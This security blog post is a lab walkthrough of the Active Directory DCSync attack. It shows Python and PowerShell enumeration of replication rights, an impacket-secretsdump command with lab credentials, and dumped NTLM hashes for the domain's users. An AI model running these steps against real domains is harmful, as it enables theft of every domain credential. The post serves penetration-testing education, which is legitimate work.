June 3, 2026
Active Directory Attacks — DCSync Attack
Osec
A DCSync attack is a technique where an attacker impersonates a Domain Controller to request and retrieve credential data (such as NTLM hashes and Kerberos keys) from Active Directory.
The core idea is that Active Directory relies on a built-in replication mechanism to keep multiple Domain Controllers synchronized. This process uses the Directory Replication Service Remote Protocol (MS-DRSR), allowing trusted systems to request updates like password changes.
The attack works because this replication feature can be accessed by any account that has the appropriate replication permissions — not just actual Domain Controllers. If an attacker compromises an account with these privileges (e.g., Domain Admin or delegated replication rights), they can abuse this trust and request sensitive credential data directly from a Domain Controller.
In short, the attacker is taking advantage of a legitimate and necessary Active Directory function (replication) and the fact that its access control is privilege-based rather than strictly limited to Domain Controllers.
Enumeration
To enumerate for a DCSync attack, your goal is to identify accounts that have directory replication privileges, since those are the only accounts capable of performing the attack.
You are looking for accounts that have the following rights on the domain:
Replicating Directory Changes
Replicating Directory Changes All
Replicating Directory Changes In Filtered Set
Any account holding these rights can use the Directory Replication Service Remote Protocol (MS-DRSR) to perform a DCSync attack.
Linux
You can enumerate for DCSync using BloodHound (recommended).
I won't use BloodHound in this demo; instead, I wrote a simple script that helps enumerate accounts capable of a DCSync attack.
The script connects to Active Directory over LDAP, retrieves the nTSecurityDescriptor of the domain object, and parses its DACL (Discretionary Access Control List) using Impacket. It then iterates through each ACE (access control entry), extracts the SID (identity), and checks whether it has one of the specific replication rights (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, or DS-Replication-Get-Changes-In-Filtered-Set) by matching their GUIDs. Finally, it groups these rights per SID and outputs only the identities that hold them, effectively identifying accounts that could potentially be used to perform a DCSync attack.
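As an added illustration (not the author's getNTSD.py, whose source is not shown on the page, and with no Impacket dependency), the following Python parses a self-relative security descriptor the way the description above outlines: walk the DACL, read each ACCESS_ALLOWED_OBJECT_ACE, decode the trustee SID, and match the ObjectType GUID against the three replication rights; the same GUIDs are the ones the PowerShell variants further down filter on. It goes one step beyond the page in that an ACE granting CONTROL_ACCESS without an ObjectType GUID grants every extended right, so such an ACE is reported for all three. The sample descriptor is constructed inline, with SIDs borrowed from the page's output and a User-Force-Change-Password ACE included to show that non-replication extended rights are ignored.

```python
import struct
import uuid
# Extended-right GUIDs that enable DCSync (the three rights listed on the page)
REPLICATION_RIGHTS = {
    uuid.UUID("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"): "DS-Replication-Get-Changes",
    uuid.UUID("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"): "DS-Replication-Get-Changes-All",
    uuid.UUID("89e95b76-444d-4c62-991a-0facbeda640c"): "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS, OBJECT_ACE, OBJECT_TYPE_PRESENT, INHERITED_TYPE_PRESENT = 0x100, 0x05, 0x1, 0x2

def parse_sid(buf, off):
    """Decode a binary SID (revision, count, 48-bit authority, sub-authorities) at buf[off:]."""
    rev, count = buf[off], buf[off + 1]
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, int.from_bytes(buf[off + 2:off + 8], "big")) + "".join("-%d" % s for s in subs)

def replication_rights(sd):
    """Walk the DACL of a self-relative security descriptor; return {sid: set of replication right names}."""
    control, dacl_off = struct.unpack_from("<H", sd, 2)[0], struct.unpack_from("<I", sd, 16)[0]
    if not control & 0x0004 or dacl_off == 0:  # SE_DACL_PRESENT clear: no DACL to inspect
        return {}
    off, found = dacl_off + 8, {}
    for _ in range(struct.unpack_from("<H", sd, dacl_off + 4)[0]):  # AceCount
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == OBJECT_ACE:  # ACCESS_ALLOWED_OBJECT_ACE; deny ACEs are not evaluated here
            mask, obj_flags = struct.unpack_from("<II", sd, off + 4)
            pos, object_type = off + 12, None
            if obj_flags & OBJECT_TYPE_PRESENT:
                object_type, pos = uuid.UUID(bytes_le=sd[pos:pos + 16]), pos + 16
            pos += 16 if obj_flags & INHERITED_TYPE_PRESENT else 0
            sid = parse_sid(sd, pos)
            # CONTROL_ACCESS with no ObjectType GUID grants every extended right, replication included
            if mask & CONTROL_ACCESS and (object_type is None or object_type in REPLICATION_RIGHTS):
                rights = REPLICATION_RIGHTS.values() if object_type is None else [REPLICATION_RIGHTS[object_type]]
                found.setdefault(sid, set()).update(rights)
        off += ace_size
    return found

def build_object_ace(mask, guid, sid):
    """Constructed ACCESS_ALLOWED_OBJECT_ACE, used only to build the sample descriptor below."""
    p = [int(x) for x in sid.split("-")[1:]]
    sid_bin = bytes([p[0], len(p) - 2]) + p[1].to_bytes(6, "big") + struct.pack("<%dI" % (len(p) - 2), *p[2:])
    body = struct.pack("<II", mask, OBJECT_TYPE_PRESENT) + guid.bytes_le + sid_bin
    return struct.pack("<BBH", OBJECT_ACE, 0, 4 + len(body)) + body

# Constructed sample: SIDs borrowed from the page's output, plus a non-replication extended right as a control
YOULOW, EDC, OTHER = "S-1-5-21-3842939050-3880317879-2865463114-1645", "S-1-5-9", "S-1-5-21-3842939050-3880317879-2865463114-1111"
GET_CHANGES, GET_CHANGES_ALL, FILTERED_SET = REPLICATION_RIGHTS
FORCE_PW = uuid.UUID("00299570-246d-11d0-a768-00aa006e0529")  # User-Force-Change-Password: extended right, not DCSync
SAMPLE_ACES = [build_object_ace(CONTROL_ACCESS, g, s) for g, s in [(GET_CHANGES, YOULOW), (GET_CHANGES_ALL, YOULOW), (FILTERED_SET, EDC), (FORCE_PW, OTHER)]]
# Header: revision 1, control SE_SELF_RELATIVE|SE_DACL_PRESENT, no owner/group/SACL, DACL (ACL_REVISION_DS = 4) at offset 20
SAMPLE_SD = struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + struct.pack("<BBHHH", 4, 0, 8 + sum(map(len, SAMPLE_ACES)), len(SAMPLE_ACES), 0) + b"".join(SAMPLE_ACES)
```

On a live domain the bytes passed to replication_rights would be the nTSecurityDescriptor attribute read over LDAP; the SIDs it returns can be resolved with rpcclient's lookupsids exactly as the post does below.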
python3 getNTSD.py -dc-ip INLANEFREIGHT.LOCAL -u INLANEFREIGHT.LOCAL\\htb-student_adm -p 'Academy_student_DA!' -d "DC=INLANEFREIGHT,DC=LOCAL"
SID: S-1-5-21-3842939050-3880317879-2865463114-1645
DS-Replication-Get-Changes: True
DS-Replication-Get-Changes-All: True
DS-Replication-Get-Changes-In-Filtered-Set: False
--------------------------------------------------
SID: S-1-5-21-3842939050-3880317879-2865463114-498
DS-Replication-Get-Changes: True
DS-Replication-Get-Changes-All: False
DS-Replication-Get-Changes-In-Filtered-Set: False
--------------------------------------------------
SID: S-1-5-21-3842939050-3880317879-2865463114-516
DS-Replication-Get-Changes: False
DS-Replication-Get-Changes-All: True
DS-Replication-Get-Changes-In-Filtered-Set: False
--------------------------------------------------
SID: S-1-5-9
DS-Replication-Get-Changes: True
DS-Replication-Get-Changes-All: False
DS-Replication-Get-Changes-In-Filtered-Set: True
--------------------------------------------------
SID: S-1-5-32-544
DS-Replication-Get-Changes: True
DS-Replication-Get-Changes-All: True
DS-Replication-Get-Changes-In-Filtered-Set: True
--------------------------------------------------
Then you can resolve the SID manually:
rpcclient -U 'htb-student_adm%Academy_student_DA!' INLANEFREIGHT.LOCAL -c "lookupsids S-1-5-21-3842939050-3880317879-2865463114-1645"
S-1-5-21-3842939050-3880317879-2865463114-1645 INLANEFREIGHT\Youlow (1)
Windows
$domain = Get-ADDomain
$dn = $domain.DistinguishedName
$acl = Get-Acl "AD:$dn"
$acl.Access | Where-Object {
$_.ObjectType -match "1131f6aa|1131f6ad|89e95b76"
} | Select-Object IdentityReference, ObjectType
It filters ACEs for these GUIDs:
1131f6aa → DS-Replication-Get-Changes
1131f6ad → DS-Replication-Get-Changes-All
89e95b76 → DS-Replication-Get-Changes-In-Filtered-Set
Using the ActiveDirectory module (this variant checks only the first two GUIDs, not DS-Replication-Get-Changes-In-Filtered-Set):
# Import AD Module
Import-Module ActiveDirectory
# Define the GUIDs for replication rights
$ReplicationGetChanges = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
$ReplicationGetChangesAll = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
# Get the domain root Distinguished Name
$DomainDN = (Get-ADDomain).DistinguishedName
# Get ACLs and filter for replication rights
Get-Acl -Path "AD:\$DomainDN" | Select-Object -ExpandProperty Access |
Where-Object {
$_.ObjectType -eq $ReplicationGetChanges -or
$_.ObjectType -eq $ReplicationGetChangesAll
} |
Select-Object IdentityReference, ActiveDirectoryRights, ObjectType
Using dsacls.exe:
dsacls (Get-ADDomain).DistinguishedName | findstr /i "Changes"
Examples:
IdentityReference ObjectType
----------------- ----------
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS 89e95b76-444d-4c62-991a-0facbeda640c
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
BUILTIN\Administrators 89e95b76-444d-4c62-991a-0facbeda640c
BUILTIN\Administrators 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
BUILTIN\Administrators 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
INLANEFREIGHT\Enterprise Read-only Domain Controllers 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
INLANEFREIGHT\Domain Controllers 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
INLANEFREIGHT\Youlow 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
INLANEFREIGHT\Youlow 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
dsacls (Get-ADDomain).DistinguishedName | findstr /i "Changes"
Allow INLANEFREIGHT\Youlow Replicating Directory Changes
Replicating Directory Changes
Replicating Directory Changes All
Allow INLANEFREIGHT\Youlow Replicating Directory Changes All
Allow BUILTIN\Administrators Replicating Directory Changes In Filtered Set
Allow BUILTIN\Administrators Replicating Directory Changes
Allow BUILTIN\Administrators Replicating Directory Changes All
Replicating Directory Changes In Filtered Set
Replicating Directory Changes
Attack
At a high level, a DCSync attack is performed by requesting directory replication data from a real DC. In practice, that means using a tool to call the MS-DRSR replication functions and retrieve password hashes.
Demo:
During enumeration we found that the domain user youlow has the required permissions on the domain object, which allows a DCSync attack.
For this demo, let's assume we have compromised that user and perform a DCSync attack using impacket-secretsdump:
impacket-secretsdump INLANEFREIGHT.LOCAL/youlow:youlow123@INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
INLANEFREIGHT.LOCAL\Administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:16e26ba33e455a8c338142af8d89ffbc:::
lab_adm:1001:aad3b435b51404eeaad3b435b51404ee:663715a1a8b957e8e9943cc98ea451b6:::
INLANEFREIGHT.LOCAL\htb-student:1111:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::
inlanefreight.local\AVazquez:1112:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
inlanefreight.local\PFalcon:1113:aad3b435b51404eeaad3b435b51404ee:f8e656de86b8b13244e7c879d8177539:::
inlanefreight.local\FAnthony:1114:aad3b435b51404eeaad3b435b51404ee:9827f62cf27fe221b4e89f7519a2092a:::
inlanefreight.local\WDillard:1115:aad3b435b51404eeaad3b435b51404ee:69ada25bbb693f9a85cd5f176948b0d5:::
inlanefreight.local\LBradford:1116:aad3b435b51404eeaad3b435b51404ee:0717dbc7b0e91125777d3ff4f3c00533:::
inlanefreight.local\SGage:1117:aad3b435b51404eeaad3b435b51404ee:31501a94e6027b74a5710c90d1c7f3b9:::
inlanefreight.local\ASanchez:1118:aad3b435b51404eeaad3b435b51404ee:c6885c0fa57ec94542d362cf7dc2d541:::
inlanefreight.local\DBranch:1119:aad3b435b51404eeaad3b435b51404ee:a87c92932b0ef15f6c9c39d6406c3a75:::
inlanefreight.local\CCruz:1120:aad3b435b51404eeaad3b435b51404ee:a9be3a88067ed776d0e2cf4ccde8ec8f:::
inlanefreight.local\NJohnson:1121:aad3b435b51404eeaad3b435b51404ee:1b2a9f3b6d785e695aadfe3485a2601f:::
inlanefreight.local\MHolliday:1122:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
inlanefreight.local\MShoemaker:1123:aad3b435b51404eeaad3b435b51404ee:c15d04d9a989b3c9f1d2db979ffa325f:::
inlanefreight.local\ASlater:1124:aad3b435b51404eeaad3b435b51404ee:e7d0a88542cb44ab48e5a89d864f8146:::
inlanefreight.local\KPrentiss:1125:aad3b435b51404eeaad3b435b51404ee:9b12a0a33aabdbd845cd3ed5070820b9:::
inlanefreight.local\GDavis:1126:aad3b435b51404eeaad3b435b51404ee:1ab3ee9bd2e35ad25670481d9d1b4e0f:::
inlanefreight.local\JMcDaniel:1127:aad3b435b51404eeaad3b435b51404ee:1e22653293daff337f58d32695c999d0:::
inlanefreight.local\JJones:1128:aad3b435b51404eeaad3b435b51404ee:a90431144f59bc8aeecc28038d6bda40:::
...
The attack works, and we manage to dump all of the domain users' hashes!
Thanks for reading :) Subscribe to get notified whenever a new article is published!
Follow me on X : https://x.com/osec403